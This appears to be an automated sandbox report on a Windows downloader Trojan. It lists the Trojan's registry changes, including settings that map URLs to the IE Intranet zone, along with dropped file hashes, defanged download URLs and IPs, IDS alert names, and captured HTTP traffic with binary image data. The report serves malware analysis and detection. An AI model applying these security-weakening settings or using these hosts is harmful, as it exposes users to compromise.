[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayIcon" = "%Program Files%\Your Product\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"UninstallString" = "%Program Files%\Your Product\uninstall.exe /U:%Program Files%\Your Product\Uninstall\uninstall.xml"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"InstallLocation" = "%Program Files%\Your Product"
"URLInfoAbout" = "http://www.yourcompany.com"
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Contact" = "Your Company Support Department"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayName" = "Your Product"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 00 60 AE EB 24 2A E3 19 B4 23 65 1A D4 A7 6E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Publisher" = "Your Company"

The process chromeupdate.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E7 12 98 0A 73 1B DF 13 86 55 77 36 1A D5 9D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
43e8f913fde18c9d26a5ef9fea97cfe7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\MediaPlayer__15159_il35679.exe
e47d6ec4ca18c28652cc9512416f49d2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe
ef609c21581a902f2f156f92477d91e4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\chromeupdate.exe
42971c53e22b8a4d1e67bcab1cb65af8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\msconfig.exe
c3f5f4a1fb69b5889f0bbb313cf6017f c:\Program Files\Your Product\lua5.1.dll
9bdcf813d65265255b820bc7a704da3c c:\Program Files\Your Product\uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.3.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.3.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 22296 22528 4.47735 c76b9ce587690b8a39ba7840b7dd540c
.rdata 28672 11906 12288 3.44864 e96aa4f970e6f6799910a72904df3100
.data 40960 6504 3072 1.79291 e504fdbba062ee9bbd9ac425a4f5c0f5
.rsrc 49152 114432 114688 5.20694 d1acdca72b7083ccd64674f12ec99111
.reloc 163840 4242 4608 2.5731 a88bdb6f651ecf67b1b3db4a2866ea4e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://bumpacpacba.com/down/kabo/apps.php 23.254.165.46
hxxp://ul.to/file/cmu9yf4p 81.171.123.200
hxxp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 81.171.103.15
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://d3a3s75zr23wnc.cloudfront.net/V31/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png
hxxp://www.download-way.com/index.php 54.83.25.106
hxxp://uploaded.net/file/cmu9yf4p 81.171.123.200
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif 216.137.59.70
hxxp://www.download-way.com/finalize.php 54.83.25.106
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif 216.137.59.70
hxxp://cdn1.downloadsoup.com/V31/amipb.js 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css 216.137.59.70
hxxp://ul.to/cmu9yf4p 81.171.123.200
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif 216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif 216.137.59.70


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ihGFCsM8E_plzZ0J6HTBF9Hk8QKHpVjql3hy0vm1OaCsZhanKUhZog==
body {..    font-size:10px;.    background:#eaeaea;.    font-family: A
rial;.    margin: 0;.    padding: 0;.    color:#000000;        .}..div
, span, textarea {.    cursor: default;.}..a, a span, a div {.    curs
or: pointer;.}../* whole screen styles   */..ami-wrapper{.   backgroun
d : none no-repeat scroll 0 0 #eaeaea;.   border:2px solid #989898; .}
../* moddle element */..#ami-body.{..position: relative;.    padding-l
eft:27;.    padding-right:27;.}...bottom-line{.    background-color:#5
cafd4;.    height:45px;.    width:100%;.}..table {.    border-collapse
: collapse;.    margin: 0 ;.    padding: 0;.    font-size:10px;.}..tex
tarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 
5px;.}...textarea1{.    background:#ffffff;.    color:#000000;.    hei
ght:100%;.    width:100%;.    overflow-x:hidden;.}..td{.    padding: 0
px;.}../* footer and footer buttons */...bottom-holder{.    background
-image:url('footer_img.png');.    background-repeat:repeat-x;.    heig
ht:59px;.    position:absolute;.    bottom:0px;.    padding-left:20px;
.    padding-right:20px;.}...#btnNext{.    background:  url('next.gif'
) no-repeat;.}.#btnCancel{.    background:  url('cancel.gif') no-repea
t;.}../* Use for cancle with no popup !!! */.#btnBack{.    background:
  url('cancel1.gif') no-repeat;.}..#btnDecline{.    background:  url('
decline.gif') no-repeat;.}..#btnAccept{.    background:  url('accept.g
if') no-repeat;.}..#btnSkip{.    background:  url('skip.gif') no-repea
t;.}...btn-finish-install{.    background:  url('finish.gif') no-r
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Fri, 18 Sep 2015 23:00:51 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22753
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fsZaDnw4YxQ1C1bo9ycU8q_uVjQ92b_dnFTMY4AfaH8i95_1ikRqTg==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8
E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397D
FE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B
910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
 <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.
]l....IEND.B`.....


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2897
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kneYqdjb33irVWIslI4GjhfH-yNyxQmdMbmQDpmUZ16MMWmiJQ7_0w==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....u.,....e........o
t.............o..nC.............GCn.t.D.............BC.EF.............
EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*...
.!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY
.....K....c...Vg,.......f. 0.k... \..b.. [email protected]...)U.U.b......W.0.....
.t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........
Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. .............
.................. }.J0...&x...f...-......AH.]pa..(..".A....=.(....p..
..X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P.
[email protected]..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t.......
.....!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt..
....m...k..........n.f.AH...k...............p..../.......7.....!...Wl.
K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t.
...L7...s....;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -apQrhg9QXRCyPP2fyUgdtnxuF7SDjvFauvCwh7jqXMXzUZAdQOFvQ==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,....e........|"E......*\......?...)....3j...... Cb
.....R...\[email protected]....>...C...:P.J.J.*U.X.:....
..`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.
3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f.
.$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........
f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......
D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x....
...F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|
...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.
4.I...R.....m$.A............".T..%.pPC./[email protected].".......!.%......v.1..
.4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YEk9S8jOVorpCH9cVz6nyJEb5E_2Lk6eZPEudQm6PZYsuwBWQBxi_g==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:59 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2895
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kgsrX92jwc2x2VRBAYO3YeumSb004M1L2IJQauwWIBVZfBh1sNvEYQ==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>


GET /file/cmu9yf4p HTTP/1.1
Accept: */*
User-Agent: Setup Factory 9.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/..Expire
s: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, m
ust-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Location:
 hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6e
ec3d08..Vary: Accept-Encoding..



GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1xu-Tb0eahQbBrnmv2Hya2cf2FTzY-CyT1tuh8TZs_gM8s6rEt2W-A==
[email protected]*.-<.AC.K=.F>.H'. ;.B,./=.E)./)[email protected]=.D=.D?.GC.M
>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)&
gt;.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).
1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..
,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&
.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.
A<.G4.9 .05.<C.F6.;;[email protected]".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A
 ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp...................
......................................................................
......................................................................
......................................................................
......................................................................
